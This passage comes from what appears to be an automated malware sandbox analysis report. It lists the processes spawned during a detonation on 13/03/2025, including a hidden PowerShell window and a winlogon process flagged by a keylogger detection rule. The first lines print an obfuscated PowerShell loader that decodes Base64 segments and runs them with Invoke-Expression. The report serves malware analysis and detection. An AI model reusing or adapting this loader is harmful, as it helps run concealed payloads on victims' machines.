$eEXA;$lYat=[string[]]$eEXA.Split('\');Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FAf = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[0].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$thN = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[1].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -Verbose '$RKq = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[2].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');QIGO $FAf $null;QIGO $thN $null;QIGO $RKq (,[string[]] ('wjzJMHoFZaIaceAGUG'));
                                                                                                      Imagebase:0x7ff662840000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:05:25:47
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -NoProfile
                                                                                                      Imagebase:0x7ff7785e0000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:05:25:47
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\more.com
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:more
                                                                                                      Imagebase:0x7ff64e4a0000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:EDB3046610020EE614B5B81B0439895E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:05:25:56
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\winlogon.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:winlogon.exe
                                                                                                      Imagebase:0x7ff7c8ec0000
                                                                                                      File size:906'240 bytes
                                                                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:05:25:57
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\lsass.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\lsass.exe
                                                                                                      Imagebase:0x7ff7fa000000
                                                                                                      File size:59'456 bytes
                                                                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:05:25:58
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:05:25:59
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\dwm.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"dwm.exe"
                                                                                                      Imagebase:0x7ff6c8bd0000
                                                                                                      File size:94'720 bytes
                                                                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:05:26:01
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:18
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:19
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:20
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:21
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:22
                                                                                                      Start time:05:26:03
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:23
                                                                                                      Start time:05:26:04
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:24
                                                                                                      Start time:05:26:05
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:25
                                                                                                      Start time:05:26:06
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:26
                                                                                                      Start time:05:26:06
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:27
                                                                                                      Start time:05:26:06
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:28
                                                                                                      Start time:05:26:07
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:29
                                                                                                      Start time:05:26:08
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:30
                                                                                                      Start time:05:26:08
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:31
                                                                                                      Start time:05:26:08
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:32
                                                                                                      Start time:05:26:09
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:33
                                                                                                      Start time:05:26:09
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:34
                                                                                                      Start time:05:26:09
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:35
                                                                                                      Start time:05:26:09
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:36
                                                                                                      Start time:05:26:10
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:37
                                                                                                      Start time:05:26:11
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:38
                                                                                                      Start time:05:26:11
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:39
                                                                                                      Start time:05:26:11
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:40
                                                                                                      Start time:05:26:12
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:41
                                                                                                      Start time:05:26:12
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:42
                                                                                                      Start time:05:26:13
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\spoolsv.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\spoolsv.exe
                                                                                                      Imagebase:0x7ff63fd10000
                                                                                                      File size:842'752 bytes
                                                                                                      MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:43
                                                                                                      Start time:05:26:14
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:44
                                                                                                      Start time:05:26:14
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:45
                                                                                                      Start time:05:26:14
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:46
                                                                                                      Start time:05:26:15
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:47
                                                                                                      Start time:05:26:15
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >